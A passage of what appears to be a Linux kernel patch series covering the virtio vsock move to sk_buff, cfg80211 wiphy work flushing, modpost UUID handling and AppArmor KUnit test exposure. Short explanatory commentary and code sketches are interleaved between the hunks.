++	vsock_addr_init(&vchild->remote_addr, le64_to_cpu(hdr->src_cid),
++			le32_to_cpu(hdr->src_port));
+ 
+ 	ret = vsock_assign_transport(vchild, vsk);
+ 	/* Transport assigned (looking at remote_addr) must be the same
+@@ -1209,17 +1236,17 @@ virtio_transport_recv_listen(struct sock *sk, struct virtio_vsock_pkt *pkt,
+ 	 */
+ 	if (ret || vchild->transport != &t->transport) {
+ 		release_sock(child);
+-		virtio_transport_reset_no_sock(t, pkt);
++		virtio_transport_reset_no_sock(t, skb);
+ 		sock_put(child);
+ 		return ret;
+ 	}
+ 
+-	if (virtio_transport_space_update(child, pkt))
++	if (virtio_transport_space_update(child, skb))
+ 		child->sk_write_space(child);
+ 
+ 	vsock_insert_connected(vchild);
+ 	vsock_enqueue_accept(sk, child);
+-	virtio_transport_send_response(vchild, pkt);
++	virtio_transport_send_response(vchild, skb);
+ 
+ 	release_sock(child);
+ 
+@@ -1237,29 +1264,30 @@ static bool virtio_transport_valid_type(u16 type)
+  * lock.
+  */
+ void virtio_transport_recv_pkt(struct virtio_transport *t,
+-			       struct virtio_vsock_pkt *pkt)
++			       struct sk_buff *skb)
+ {
++	struct virtio_vsock_hdr *hdr = virtio_vsock_hdr(skb);
+ 	struct sockaddr_vm src, dst;
+ 	struct vsock_sock *vsk;
+ 	struct sock *sk;
+ 	bool space_available;
+ 
+-	vsock_addr_init(&src, le64_to_cpu(pkt->hdr.src_cid),
+-			le32_to_cpu(pkt->hdr.src_port));
+-	vsock_addr_init(&dst, le64_to_cpu(pkt->hdr.dst_cid),
+-			le32_to_cpu(pkt->hdr.dst_port));
++	vsock_addr_init(&src, le64_to_cpu(hdr->src_cid),
++			le32_to_cpu(hdr->src_port));
++	vsock_addr_init(&dst, le64_to_cpu(hdr->dst_cid),
++			le32_to_cpu(hdr->dst_port));
+ 
+ 	trace_virtio_transport_recv_pkt(src.svm_cid, src.svm_port,
+ 					dst.svm_cid, dst.svm_port,
+-					le32_to_cpu(pkt->hdr.len),
+-					le16_to_cpu(pkt->hdr.type),
+-					le16_to_cpu(pkt->hdr.op),
+-					le32_to_cpu(pkt->hdr.flags),
+-					le32_to_cpu(pkt->hdr.buf_alloc),
+-					le32_to_cpu(pkt->hdr.fwd_cnt));
+-
+-	if (!virtio_transport_valid_type(le16_to_cpu(pkt->hdr.type))) {
+-		(void)virtio_transport_reset_no_sock(t, pkt);
++					le32_to_cpu(hdr->len),
++					le16_to_cpu(hdr->type),
++					le16_to_cpu(hdr->op),
++					le32_to_cpu(hdr->flags),
++					le32_to_cpu(hdr->buf_alloc),
++					le32_to_cpu(hdr->fwd_cnt));
++
++	if (!virtio_transport_valid_type(le16_to_cpu(hdr->type))) {
++		(void)virtio_transport_reset_no_sock(t, skb);
+ 		goto free_pkt;
+ 	}
+ 
+@@ -1270,30 +1298,35 @@ void virtio_transport_recv_pkt(struct virtio_transport *t,
+ 	if (!sk) {
+ 		sk = vsock_find_bound_socket(&dst);
+ 		if (!sk) {
+-			(void)virtio_transport_reset_no_sock(t, pkt);
++			(void)virtio_transport_reset_no_sock(t, skb);
+ 			goto free_pkt;
+ 		}
+ 	}
+ 
+-	if (virtio_transport_get_type(sk) != le16_to_cpu(pkt->hdr.type)) {
+-		(void)virtio_transport_reset_no_sock(t, pkt);
++	if (virtio_transport_get_type(sk) != le16_to_cpu(hdr->type)) {
++		(void)virtio_transport_reset_no_sock(t, skb);
+ 		sock_put(sk);
+ 		goto free_pkt;
+ 	}
+ 
++	if (!skb_set_owner_sk_safe(skb, sk)) {
++		WARN_ONCE(1, "receiving vsock socket has sk_refcnt == 0\n");
++		goto free_pkt;
++	}
++
+ 	vsk = vsock_sk(sk);
+ 
+ 	lock_sock(sk);
+ 
+ 	/* Check if sk has been closed before lock_sock */
+ 	if (sock_flag(sk, SOCK_DONE)) {
+-		(void)virtio_transport_reset_no_sock(t, pkt);
++		(void)virtio_transport_reset_no_sock(t, skb);
+ 		release_sock(sk);
+ 		sock_put(sk);
+ 		goto free_pkt;
+ 	}
+ 
+-	space_available = virtio_transport_space_update(sk, pkt);
++	space_available = virtio_transport_space_update(sk, skb);
+ 
+ 	/* Update CID in case it has changed after a transport reset event */
+ 	if (vsk->local_addr.svm_cid != VMADDR_CID_ANY)
+@@ -1304,23 +1337,23 @@ void virtio_transport_recv_pkt(struct virtio_transport *t,
+ 
+ 	switch (sk->sk_state) {
+ 	case TCP_LISTEN:
+-		virtio_transport_recv_listen(sk, pkt, t);
+-		virtio_transport_free_pkt(pkt);
++		virtio_transport_recv_listen(sk, skb, t);
++		kfree_skb(skb);
+ 		break;
+ 	case TCP_SYN_SENT:
+-		virtio_transport_recv_connecting(sk, pkt);
+-		virtio_transport_free_pkt(pkt);
++		virtio_transport_recv_connecting(sk, skb);
++		kfree_skb(skb);
+ 		break;
+ 	case TCP_ESTABLISHED:
+-		virtio_transport_recv_connected(sk, pkt);
++		virtio_transport_recv_connected(sk, skb);
+ 		break;
+ 	case TCP_CLOSING:
+-		virtio_transport_recv_disconnecting(sk, pkt);
+-		virtio_transport_free_pkt(pkt);
++		virtio_transport_recv_disconnecting(sk, skb);
++		kfree_skb(skb);
+ 		break;
+ 	default:
+-		(void)virtio_transport_reset_no_sock(t, pkt);
+-		virtio_transport_free_pkt(pkt);
++		(void)virtio_transport_reset_no_sock(t, skb);
++		kfree_skb(skb);
+ 		break;
+ 	}
+ 
+@@ -1333,16 +1366,42 @@ void virtio_transport_recv_pkt(struct virtio_transport *t,
+ 	return;
+ 
+ free_pkt:
+-	virtio_transport_free_pkt(pkt);
++	kfree_skb(skb);
+ }
+ EXPORT_SYMBOL_GPL(virtio_transport_recv_pkt);
+ 
+-void virtio_transport_free_pkt(struct virtio_vsock_pkt *pkt)
++/* Remove skbs found in a queue that have a vsk that matches.
++ *
++ * Each skb is freed.
++ *
++ * Returns the count of skbs that were reply packets.
++ */
++int virtio_transport_purge_skbs(void *vsk, struct sk_buff_head *queue)
+ {
+-	kvfree(pkt->buf);
+-	kfree(pkt);
++	struct sk_buff_head freeme;
++	struct sk_buff *skb, *tmp;
++	int cnt = 0;
++
++	skb_queue_head_init(&freeme);
++
++	spin_lock_bh(&queue->lock);
++	skb_queue_walk_safe(queue, skb, tmp) {
++		if (vsock_sk(skb->sk) != vsk)
++			continue;
++
++		__skb_unlink(skb, queue);
++		__skb_queue_tail(&freeme, skb);
++
++		if (virtio_vsock_skb_reply(skb))
++			cnt++;
++	}
++	spin_unlock_bh(&queue->lock);
++
++	__skb_queue_purge(&freeme);
++
++	return cnt;
+ }
+-EXPORT_SYMBOL_GPL(virtio_transport_free_pkt);
++EXPORT_SYMBOL_GPL(virtio_transport_purge_skbs);
+ 
+ MODULE_LICENSE("GPL v2");
+ MODULE_AUTHOR("Asias He");
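
On the transport-common side, rx accounting now works on plain byte lengths (virtio_transport_inc/dec_rx_pkt take a u32), and the small-packet coalescing path copies into the tailroom of the last queued skb, growing the stashed header length with le32_add_cpu() instead of maintaining a separate pkt->len/pkt->off pair. A reduced model of the coalescing decision, with fixed-capacity buffers standing in for skbs:

#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define GOOD_COPY_LEN 128

struct rxbuf { size_t len, cap; char data[256]; };

/* Append a small payload into the previous buffer when it fits,
 * mirroring the skb_tailroom()/skb_put() check in the hunk above. */
static bool try_coalesce(struct rxbuf *last, const char *p, size_t n)
{
	if (n > GOOD_COPY_LEN || n >= last->cap - last->len)
		return false;

	memcpy(last->data + last->len, p, n);
	last->len += n;		/* the kernel also le32_add_cpu()s hdr->len */
	return true;
}

int main(void)
{
	struct rxbuf last = { 4, sizeof(last.data), "abcd" };

	printf("%d len=%zu\n", try_coalesce(&last, "efgh", 4), last.len);
	return 0;
}
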
+diff --git a/net/vmw_vsock/vsock_loopback.c b/net/vmw_vsock/vsock_loopback.c
+index 169a8cf65b390..89905c092645a 100644
+--- a/net/vmw_vsock/vsock_loopback.c
++++ b/net/vmw_vsock/vsock_loopback.c
+@@ -15,8 +15,7 @@
+ struct vsock_loopback {
+ 	struct workqueue_struct *workqueue;
+ 
+-	spinlock_t pkt_list_lock; /* protects pkt_list */
+-	struct list_head pkt_list;
++	struct sk_buff_head pkt_queue;
+ 	struct work_struct pkt_work;
+ };
+ 
+@@ -27,14 +26,12 @@ static u32 vsock_loopback_get_local_cid(void)
+ 	return VMADDR_CID_LOCAL;
+ }
+ 
+-static int vsock_loopback_send_pkt(struct virtio_vsock_pkt *pkt)
++static int vsock_loopback_send_pkt(struct sk_buff *skb)
+ {
+ 	struct vsock_loopback *vsock = &the_vsock_loopback;
+-	int len = pkt->len;
++	int len = skb->len;
+ 
+-	spin_lock_bh(&vsock->pkt_list_lock);
+-	list_add_tail(&pkt->list, &vsock->pkt_list);
+-	spin_unlock_bh(&vsock->pkt_list_lock);
++	skb_queue_tail(&vsock->pkt_queue, skb);
+ 
+ 	queue_work(vsock->workqueue, &vsock->pkt_work);
+ 
+@@ -44,21 +41,8 @@ static int vsock_loopback_send_pkt(struct virtio_vsock_pkt *pkt)
+ static int vsock_loopback_cancel_pkt(struct vsock_sock *vsk)
+ {
+ 	struct vsock_loopback *vsock = &the_vsock_loopback;
+-	struct virtio_vsock_pkt *pkt, *n;
+-	LIST_HEAD(freeme);
+-
+-	spin_lock_bh(&vsock->pkt_list_lock);
+-	list_for_each_entry_safe(pkt, n, &vsock->pkt_list, list) {
+-		if (pkt->vsk != vsk)
+-			continue;
+-		list_move(&pkt->list, &freeme);
+-	}
+-	spin_unlock_bh(&vsock->pkt_list_lock);
+ 
+-	list_for_each_entry_safe(pkt, n, &freeme, list) {
+-		list_del(&pkt->list);
+-		virtio_transport_free_pkt(pkt);
+-	}
++	virtio_transport_purge_skbs(vsk, &vsock->pkt_queue);
+ 
+ 	return 0;
+ }
+@@ -121,20 +105,18 @@ static void vsock_loopback_work(struct work_struct *work)
+ {
+ 	struct vsock_loopback *vsock =
+ 		container_of(work, struct vsock_loopback, pkt_work);
+-	LIST_HEAD(pkts);
++	struct sk_buff_head pkts;
++	struct sk_buff *skb;
+ 
+-	spin_lock_bh(&vsock->pkt_list_lock);
+-	list_splice_init(&vsock->pkt_list, &pkts);
+-	spin_unlock_bh(&vsock->pkt_list_lock);
++	skb_queue_head_init(&pkts);
+ 
+-	while (!list_empty(&pkts)) {
+-		struct virtio_vsock_pkt *pkt;
++	spin_lock_bh(&vsock->pkt_queue.lock);
++	skb_queue_splice_init(&vsock->pkt_queue, &pkts);
++	spin_unlock_bh(&vsock->pkt_queue.lock);
+ 
+-		pkt = list_first_entry(&pkts, struct virtio_vsock_pkt, list);
+-		list_del_init(&pkt->list);
+-
+-		virtio_transport_deliver_tap_pkt(pkt);
+-		virtio_transport_recv_pkt(&loopback_transport, pkt);
++	while ((skb = __skb_dequeue(&pkts))) {
++		virtio_transport_deliver_tap_pkt(skb);
++		virtio_transport_recv_pkt(&loopback_transport, skb);
+ 	}
+ }
+ 
+@@ -147,8 +129,7 @@ static int __init vsock_loopback_init(void)
+ 	if (!vsock->workqueue)
+ 		return -ENOMEM;
+ 
+-	spin_lock_init(&vsock->pkt_list_lock);
+-	INIT_LIST_HEAD(&vsock->pkt_list);
++	skb_queue_head_init(&vsock->pkt_queue);
+ 	INIT_WORK(&vsock->pkt_work, vsock_loopback_work);
+ 
+ 	ret = vsock_core_register(&loopback_transport.transport,
+@@ -166,20 +147,12 @@ out_wq:
+ static void __exit vsock_loopback_exit(void)
+ {
+ 	struct vsock_loopback *vsock = &the_vsock_loopback;
+-	struct virtio_vsock_pkt *pkt;
+ 
+ 	vsock_core_unregister(&loopback_transport.transport);
+ 
+ 	flush_work(&vsock->pkt_work);
+ 
+-	spin_lock_bh(&vsock->pkt_list_lock);
+-	while (!list_empty(&vsock->pkt_list)) {
+-		pkt = list_first_entry(&vsock->pkt_list,
+-				       struct virtio_vsock_pkt, list);
+-		list_del(&pkt->list);
+-		virtio_transport_free_pkt(pkt);
+-	}
+-	spin_unlock_bh(&vsock->pkt_list_lock);
++	virtio_vsock_skb_queue_purge(&vsock->pkt_queue);
+ 
+ 	destroy_workqueue(vsock->workqueue);
+ }
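
vsock_loopback_work() above also shows the standard splice-and-drain idiom for sk_buff_head consumers: the producer queue's lock is held only for an O(1) skb_queue_splice_init() handoff onto an on-stack list, and delivery then proceeds without the lock, since the local list has a single owner. Condensed, using the names from the patch:

    struct sk_buff_head pkts;
    struct sk_buff *skb;

    skb_queue_head_init(&pkts);

    /* O(1) handoff; producers can keep queueing while we drain */
    spin_lock_bh(&vsock->pkt_queue.lock);
    skb_queue_splice_init(&vsock->pkt_queue, &pkts);
    spin_unlock_bh(&vsock->pkt_queue.lock);

    while ((skb = __skb_dequeue(&pkts))) {
        virtio_transport_deliver_tap_pkt(skb);
        virtio_transport_recv_pkt(&loopback_transport, skb);
    }
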
+diff --git a/net/wireless/core.c b/net/wireless/core.c
+index bf2f1f583fb12..63d75fecc2c53 100644
+--- a/net/wireless/core.c
++++ b/net/wireless/core.c
+@@ -1042,7 +1042,8 @@ void wiphy_rfkill_start_polling(struct wiphy *wiphy)
+ }
+ EXPORT_SYMBOL(wiphy_rfkill_start_polling);
+ 
+-void cfg80211_process_wiphy_works(struct cfg80211_registered_device *rdev)
++void cfg80211_process_wiphy_works(struct cfg80211_registered_device *rdev,
++				  struct wiphy_work *end)
+ {
+ 	unsigned int runaway_limit = 100;
+ 	unsigned long flags;
+@@ -1061,6 +1062,10 @@ void cfg80211_process_wiphy_works(struct cfg80211_registered_device *rdev)
+ 		wk->func(&rdev->wiphy, wk);
+ 
+ 		spin_lock_irqsave(&rdev->wiphy_work_lock, flags);
++
++		if (wk == end)
++			break;
++
+ 		if (WARN_ON(--runaway_limit == 0))
+ 			INIT_LIST_HEAD(&rdev->wiphy_work_list);
+ 	}
+@@ -1111,7 +1116,7 @@ void wiphy_unregister(struct wiphy *wiphy)
+ #endif
+ 
+ 	/* surely nothing is reachable now, clean up work */
+-	cfg80211_process_wiphy_works(rdev);
++	cfg80211_process_wiphy_works(rdev, NULL);
+ 	wiphy_unlock(&rdev->wiphy);
+ 	rtnl_unlock();
+ 
+@@ -1636,6 +1641,21 @@ void wiphy_work_cancel(struct wiphy *wiphy, struct wiphy_work *work)
+ }
+ EXPORT_SYMBOL_GPL(wiphy_work_cancel);
+ 
++void wiphy_work_flush(struct wiphy *wiphy, struct wiphy_work *work)
++{
++	struct cfg80211_registered_device *rdev = wiphy_to_rdev(wiphy);
++	unsigned long flags;
++	bool run;
++
++	spin_lock_irqsave(&rdev->wiphy_work_lock, flags);
++	run = !work || !list_empty(&work->entry);
++	spin_unlock_irqrestore(&rdev->wiphy_work_lock, flags);
++
++	if (run)
++		cfg80211_process_wiphy_works(rdev, work);
++}
++EXPORT_SYMBOL_GPL(wiphy_work_flush);
++
+ void wiphy_delayed_work_timer(struct timer_list *t)
+ {
+ 	struct wiphy_delayed_work *dwork = from_timer(dwork, t, timer);
+@@ -1668,6 +1688,16 @@ void wiphy_delayed_work_cancel(struct wiphy *wiphy,
+ }
+ EXPORT_SYMBOL_GPL(wiphy_delayed_work_cancel);
+ 
++void wiphy_delayed_work_flush(struct wiphy *wiphy,
++			      struct wiphy_delayed_work *dwork)
++{
++	lockdep_assert_held(&wiphy->mtx);
++
++	del_timer_sync(&dwork->timer);
++	wiphy_work_flush(wiphy, &dwork->work);
++}
++EXPORT_SYMBOL_GPL(wiphy_delayed_work_flush);
++
+ static int __init cfg80211_init(void)
+ {
+ 	int err;
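
The new `end` parameter turns cfg80211_process_wiphy_works() into a bounded drain: it executes queued wiphy works until the given item has run, then stops, which is exactly the guarantee wiphy_work_flush() needs; passing NULL keeps the old run-until-empty behaviour. A hypothetical driver-side caller, assuming a driver-owned wiphy_delayed_work (my_priv and scan_dwork are illustrative names, not from the patch):

    /* teardown sketch: caller must hold the wiphy mutex, per the
     * lockdep_assert_held() in wiphy_delayed_work_flush() */
    static void my_drv_stop(struct wiphy *wiphy, struct my_priv *priv)
    {
        /* stops the timer, then synchronously runs the work if queued */
        wiphy_delayed_work_flush(wiphy, &priv->scan_dwork);
    }
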
+diff --git a/net/wireless/core.h b/net/wireless/core.h
+index 86fd79912254d..e1accacc6f233 100644
+--- a/net/wireless/core.h
++++ b/net/wireless/core.h
+@@ -461,7 +461,8 @@ int cfg80211_change_iface(struct cfg80211_registered_device *rdev,
+ 			  struct net_device *dev, enum nl80211_iftype ntype,
+ 			  struct vif_params *params);
+ void cfg80211_process_rdev_events(struct cfg80211_registered_device *rdev);
+-void cfg80211_process_wiphy_works(struct cfg80211_registered_device *rdev);
++void cfg80211_process_wiphy_works(struct cfg80211_registered_device *rdev,
++				  struct wiphy_work *end);
+ void cfg80211_process_wdev_events(struct wireless_dev *wdev);
+ 
+ bool cfg80211_does_bw_fit_range(const struct ieee80211_freq_range *freq_range,
+diff --git a/net/wireless/sysfs.c b/net/wireless/sysfs.c
+index 4d3b658030105..a88f338c61d31 100644
+--- a/net/wireless/sysfs.c
++++ b/net/wireless/sysfs.c
+@@ -105,14 +105,14 @@ static int wiphy_suspend(struct device *dev)
+ 			cfg80211_leave_all(rdev);
+ 			cfg80211_process_rdev_events(rdev);
+ 		}
+-		cfg80211_process_wiphy_works(rdev);
++		cfg80211_process_wiphy_works(rdev, NULL);
+ 		if (rdev->ops->suspend)
+ 			ret = rdev_suspend(rdev, rdev->wiphy.wowlan_config);
+ 		if (ret == 1) {
+ 			/* Driver refuse to configure wowlan */
+ 			cfg80211_leave_all(rdev);
+ 			cfg80211_process_rdev_events(rdev);
+-			cfg80211_process_wiphy_works(rdev);
++			cfg80211_process_wiphy_works(rdev, NULL);
+ 			ret = rdev_suspend(rdev, NULL);
+ 		}
+ 		if (ret == 0)
+diff --git a/scripts/mod/file2alias.c b/scripts/mod/file2alias.c
+index 111d5464c12df..39e2c8883ddd4 100644
+--- a/scripts/mod/file2alias.c
++++ b/scripts/mod/file2alias.c
+@@ -1348,13 +1348,13 @@ static int do_typec_entry(const char *filename, void *symval, char *alias)
+ /* Looks like: tee:uuid */
+ static int do_tee_entry(const char *filename, void *symval, char *alias)
+ {
+-	DEF_FIELD(symval, tee_client_device_id, uuid);
++	DEF_FIELD_ADDR(symval, tee_client_device_id, uuid);
+ 
+ 	sprintf(alias, "tee:%02x%02x%02x%02x-%02x%02x-%02x%02x-%02x%02x-%02x%02x%02x%02x%02x%02x",
+-		uuid.b[0], uuid.b[1], uuid.b[2], uuid.b[3], uuid.b[4],
+-		uuid.b[5], uuid.b[6], uuid.b[7], uuid.b[8], uuid.b[9],
+-		uuid.b[10], uuid.b[11], uuid.b[12], uuid.b[13], uuid.b[14],
+-		uuid.b[15]);
++		uuid->b[0], uuid->b[1], uuid->b[2], uuid->b[3], uuid->b[4],
++		uuid->b[5], uuid->b[6], uuid->b[7], uuid->b[8], uuid->b[9],
++		uuid->b[10], uuid->b[11], uuid->b[12], uuid->b[13], uuid->b[14],
++		uuid->b[15]);
+ 
+ 	add_wildcard(alias);
+ 	return 1;
+@@ -1401,10 +1401,10 @@ static int do_mhi_ep_entry(const char *filename, void *symval, char *alias)
+ /* Looks like: ishtp:{guid} */
+ static int do_ishtp_entry(const char *filename, void *symval, char *alias)
+ {
+-	DEF_FIELD(symval, ishtp_device_id, guid);
++	DEF_FIELD_ADDR(symval, ishtp_device_id, guid);
+ 
+ 	strcpy(alias, ISHTP_MODULE_PREFIX "{");
+-	add_guid(alias, guid);
++	add_guid(alias, *guid);
+ 	strcat(alias, "}");
+ 
+ 	return 1;
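
Background for the DEF_FIELD to DEF_FIELD_ADDR swaps: DEF_FIELD copies the field out of the device-table blob and runs it through TO_NATIVE(), modpost's host/target endianness fixup. That is right for scalar IDs but corrupts byte arrays such as UUIDs/GUIDs when host and target endianness differ, since the bytes get swapped as if they were one integer. DEF_FIELD_ADDR instead yields a pointer into the blob, leaving the bytes untouched. A paraphrase of the two macros' intent (not the exact scripts/mod/file2alias.c definitions):

    /* copy + endian conversion: for scalar fields only */
    #define DEF_FIELD(m, devid, f) \
        typeof(((struct devid *)0)->f) f = \
            TO_NATIVE(*(typeof(f) *)((m) + OFF_##devid##_##f))

    /* pointer into the raw table: safe for arrays and structs */
    #define DEF_FIELD_ADDR(m, devid, f) \
        typeof(((struct devid *)0)->f) *f = \
            (void *)((m) + OFF_##devid##_##f)
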
+diff --git a/security/apparmor/Kconfig b/security/apparmor/Kconfig
+index cb3496e00d8a6..f334e7cccf2da 100644
+--- a/security/apparmor/Kconfig
++++ b/security/apparmor/Kconfig
+@@ -106,8 +106,8 @@ config SECURITY_APPARMOR_PARANOID_LOAD
+ 	  Disabling the check will speed up policy loads.
+ 
+ config SECURITY_APPARMOR_KUNIT_TEST
+-	bool "Build KUnit tests for policy_unpack.c" if !KUNIT_ALL_TESTS
+-	depends on KUNIT=y && SECURITY_APPARMOR
++	tristate "Build KUnit tests for policy_unpack.c" if !KUNIT_ALL_TESTS
++	depends on KUNIT && SECURITY_APPARMOR
+ 	default KUNIT_ALL_TESTS
+ 	help
+ 	  This builds the AppArmor KUnit tests.
+diff --git a/security/apparmor/Makefile b/security/apparmor/Makefile
+index ff23fcfefe196..065f4e346553d 100644
+--- a/security/apparmor/Makefile
++++ b/security/apparmor/Makefile
+@@ -8,6 +8,9 @@ apparmor-y := apparmorfs.o audit.o capability.o task.o ipc.o lib.o match.o \
+               resource.o secid.o file.o policy_ns.o label.o mount.o net.o
+ apparmor-$(CONFIG_SECURITY_APPARMOR_HASH) += crypto.o
+ 
++obj-$(CONFIG_SECURITY_APPARMOR_KUNIT_TEST) += apparmor_policy_unpack_test.o
++apparmor_policy_unpack_test-objs += policy_unpack_test.o
++
+ clean-files := capability_names.h rlim_names.h net_names.h
+ 
+ # Build a lower case string table of address family names
+diff --git a/security/apparmor/include/policy_unpack.h b/security/apparmor/include/policy_unpack.h
+index eb5f7d7f132bb..e89b701447bcb 100644
+--- a/security/apparmor/include/policy_unpack.h
++++ b/security/apparmor/include/policy_unpack.h
+@@ -48,6 +48,43 @@ enum {
+ 	AAFS_LOADDATA_NDENTS		/* count of entries */
+ };
+ 
++/*
++ * The AppArmor interface treats data as a type byte followed by the
++ * actual data.  The interface has the notion of a named entry
++ * which has a name (AA_NAME typecode followed by name string) followed by
++ * the entry's typecode and data.  Named types allow for optional
++ * elements and extensions to be added and tested for without breaking
++ * backwards compatibility.
++ */
++
++enum aa_code {
++	AA_U8,
++	AA_U16,
++	AA_U32,
++	AA_U64,
++	AA_NAME,		/* same as string except it is the item's name */
++	AA_STRING,
++	AA_BLOB,
++	AA_STRUCT,
++	AA_STRUCTEND,
++	AA_LIST,
++	AA_LISTEND,
++	AA_ARRAY,
++	AA_ARRAYEND,
++};
++
++/*
++ * aa_ext is the read head for the buffer containing the serialized profile.  The
++ * data is copied into a kernel buffer in apparmorfs and then handed off to
++ * the unpack routines.
++ */
++struct aa_ext {
++	void *start;
++	void *end;
++	void *pos;		/* pointer to current position in the buffer */
++	u32 version;
++};
++
+ /*
+  * struct aa_loaddata - buffer of policy raw_data set
+  *
+@@ -126,4 +163,17 @@ static inline void aa_put_loaddata(struct aa_loaddata *data)
+ 		kref_put(&data->count, aa_loaddata_kref);
+ }
+ 
++#if IS_ENABLED(CONFIG_KUNIT)
++bool aa_inbounds(struct aa_ext *e, size_t size);
++size_t aa_unpack_u16_chunk(struct aa_ext *e, char **chunk);
++bool aa_unpack_X(struct aa_ext *e, enum aa_code code);
++bool aa_unpack_nameX(struct aa_ext *e, enum aa_code code, const char *name);
++bool aa_unpack_u32(struct aa_ext *e, u32 *data, const char *name);
++bool aa_unpack_u64(struct aa_ext *e, u64 *data, const char *name);
++size_t aa_unpack_array(struct aa_ext *e, const char *name);
++size_t aa_unpack_blob(struct aa_ext *e, char **blob, const char *name);
++int aa_unpack_str(struct aa_ext *e, const char **string, const char *name);
++int aa_unpack_strdup(struct aa_ext *e, char **string, const char *name);
++#endif
++
+ #endif /* __POLICY_INTERFACE_H */
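
The IS_ENABLED(CONFIG_KUNIT) prototype block above is the consumer side of the <kunit/visibility.h> helpers used in policy_unpack.c below: VISIBLE_IF_KUNIT removes `static` from a symbol when KUnit is built in, and EXPORT_SYMBOL_IF_KUNIT exports it into a dedicated symbol namespace that only modules declaring MODULE_IMPORT_NS(EXPORTED_FOR_KUNIT_TESTING) can link against. In outline (simplified from the upstream header):

    #if IS_ENABLED(CONFIG_KUNIT)
    #define VISIBLE_IF_KUNIT		/* empty: symbol becomes global */
    #define EXPORT_SYMBOL_IF_KUNIT(symbol) \
        EXPORT_SYMBOL_NS(symbol, EXPORTED_FOR_KUNIT_TESTING)
    #else
    #define VISIBLE_IF_KUNIT static	/* normal builds keep it private */
    #define EXPORT_SYMBOL_IF_KUNIT(symbol)
    #endif
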
+diff --git a/security/apparmor/policy.c b/security/apparmor/policy.c
+index fbdfcef91c616..c7b84fb568414 100644
+--- a/security/apparmor/policy.c
++++ b/security/apparmor/policy.c
+@@ -218,6 +218,7 @@ void aa_free_profile(struct aa_profile *profile)
+ 
+ 	aa_put_ns(profile->ns);
+ 	kfree_sensitive(profile->rename);
++	kfree_sensitive(profile->disconnected);
+ 
+ 	aa_free_file_rules(&profile->file);
+ 	aa_free_cap_rules(&profile->caps);
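
This one-line kfree_sensitive() pairs with the unpack_profile() change further down: the "disconnected" attachment string used to be a bare pointer into the raw policy blob (aa_unpack_str()), but is now a private copy (aa_unpack_strdup()), so the profile owns it and the free path has to release it. Without the strdup the pointer could outlive the raw blob; without this free the copy would leak. The ownership rule in miniature:

    char *disconnected = NULL;

    /* optional element: ignore failure, like the patch does */
    (void) aa_unpack_strdup(e, &disconnected, "disconnected");
    profile->disconnected = disconnected;	/* profile owns the copy... */

    /* ...so aa_free_profile() must release it */
    kfree_sensitive(profile->disconnected);
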
+diff --git a/security/apparmor/policy_unpack.c b/security/apparmor/policy_unpack.c
+index 9c3fec2c7cf6b..7012fd82f1bb1 100644
+--- a/security/apparmor/policy_unpack.c
++++ b/security/apparmor/policy_unpack.c
+@@ -14,6 +14,7 @@
+  */
+ 
+ #include <asm/unaligned.h>
++#include <kunit/visibility.h>
+ #include <linux/ctype.h>
+ #include <linux/errno.h>
+ #include <linux/zlib.h>
+@@ -37,43 +38,6 @@
+ #define v7	7
+ #define v8	8	/* full network masking */
+ 
+-/*
+- * The AppArmor interface treats data as a type byte followed by the
+- * actual data.  The interface has the notion of a named entry
+- * which has a name (AA_NAME typecode followed by name string) followed by
+- * the entries typecode and data.  Named types allow for optional
+- * elements and extensions to be added and tested for without breaking
+- * backwards compatibility.
+- */
+-
+-enum aa_code {
+-	AA_U8,
+-	AA_U16,
+-	AA_U32,
+-	AA_U64,
+-	AA_NAME,		/* same as string except it is items name */
+-	AA_STRING,
+-	AA_BLOB,
+-	AA_STRUCT,
+-	AA_STRUCTEND,
+-	AA_LIST,
+-	AA_LISTEND,
+-	AA_ARRAY,
+-	AA_ARRAYEND,
+-};
+-
+-/*
+- * aa_ext is the read of the buffer containing the serialized profile.  The
+- * data is copied into a kernel buffer in apparmorfs and then handed off to
+- * the unpack routines.
+- */
+-struct aa_ext {
+-	void *start;
+-	void *end;
+-	void *pos;		/* pointer to current position in the buffer */
+-	u32 version;
+-};
+-
+ /* audit callback for unpack fields */
+ static void audit_cb(struct audit_buffer *ab, void *va)
+ {
+@@ -199,10 +163,11 @@ struct aa_loaddata *aa_loaddata_alloc(size_t size)
+ }
+ 
+ /* test if read will be in packed data bounds */
+-static bool inbounds(struct aa_ext *e, size_t size)
++VISIBLE_IF_KUNIT bool aa_inbounds(struct aa_ext *e, size_t size)
+ {
+ 	return (size <= e->end - e->pos);
+ }
++EXPORT_SYMBOL_IF_KUNIT(aa_inbounds);
+ 
+ static void *kvmemdup(const void *src, size_t len)
+ {
+@@ -214,22 +179,22 @@ static void *kvmemdup(const void *src, size_t len)
+ }
+ 
+ /**
+- * unpack_u16_chunk - test and do bounds checking for a u16 size based chunk
++ * aa_unpack_u16_chunk - test and do bounds checking for a u16 size based chunk
+  * @e: serialized data read head (NOT NULL)
+  * @chunk: start address for chunk of data (NOT NULL)
+  *
+  * Returns: the size of chunk found with the read head at the end of the chunk.
+  */
+-static size_t unpack_u16_chunk(struct aa_ext *e, char **chunk)
++VISIBLE_IF_KUNIT size_t aa_unpack_u16_chunk(struct aa_ext *e, char **chunk)
+ {
+ 	size_t size = 0;
+ 	void *pos = e->pos;
+ 
+-	if (!inbounds(e, sizeof(u16)))
++	if (!aa_inbounds(e, sizeof(u16)))
+ 		goto fail;
+ 	size = le16_to_cpu(get_unaligned((__le16 *) e->pos));
+ 	e->pos += sizeof(__le16);
+-	if (!inbounds(e, size))
++	if (!aa_inbounds(e, size))
+ 		goto fail;
+ 	*chunk = e->pos;
+ 	e->pos += size;
+@@ -239,20 +204,22 @@ fail:
+ 	e->pos = pos;
+ 	return 0;
+ }
++EXPORT_SYMBOL_IF_KUNIT(aa_unpack_u16_chunk);
+ 
+ /* unpack control byte */
+-static bool unpack_X(struct aa_ext *e, enum aa_code code)
++VISIBLE_IF_KUNIT bool aa_unpack_X(struct aa_ext *e, enum aa_code code)
+ {
+-	if (!inbounds(e, 1))
++	if (!aa_inbounds(e, 1))
+ 		return false;
+ 	if (*(u8 *) e->pos != code)
+ 		return false;
+ 	e->pos++;
+ 	return true;
+ }
++EXPORT_SYMBOL_IF_KUNIT(aa_unpack_X);
+ 
+ /**
+- * unpack_nameX - check is the next element is of type X with a name of @name
++ * aa_unpack_nameX - check if the next element is of type X with a name of @name
+  * @e: serialized data extent information  (NOT NULL)
+  * @code: type code
+  * @name: name to match to the serialized element.  (MAYBE NULL)
+@@ -267,7 +234,7 @@ static bool unpack_X(struct aa_ext *e, enum aa_code code)
+  *
